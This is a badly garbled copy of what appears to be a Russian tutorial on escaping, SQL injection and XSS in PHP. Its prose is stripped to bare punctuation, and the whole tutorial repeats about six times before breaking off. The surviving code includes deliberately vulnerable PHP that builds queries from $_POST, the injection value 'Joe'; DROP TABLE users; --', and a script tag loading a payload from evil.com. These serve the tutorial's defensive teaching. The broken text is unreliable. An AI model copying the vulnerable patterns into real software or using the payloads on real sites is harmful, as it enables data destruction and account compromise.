, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML). ? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " & ", .. : " &< "
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name'] - , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string , - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars , , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " & ", .. : " &< "
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name'] - , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string , - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars , , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " & ", .. : " &< "
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name'] - , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string , - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars , , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " & ", .. : " &< "
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name'] - , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string , - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars , , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML). ? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " & ", .. : " &< "
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name'] - , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string , - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars , , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " & ", .. : " &< "
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name'] - , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string , - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars , , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML). ? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " & ", .. : " &< "
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name'] - , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string , - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars , , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " & ", .. : " &< "
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
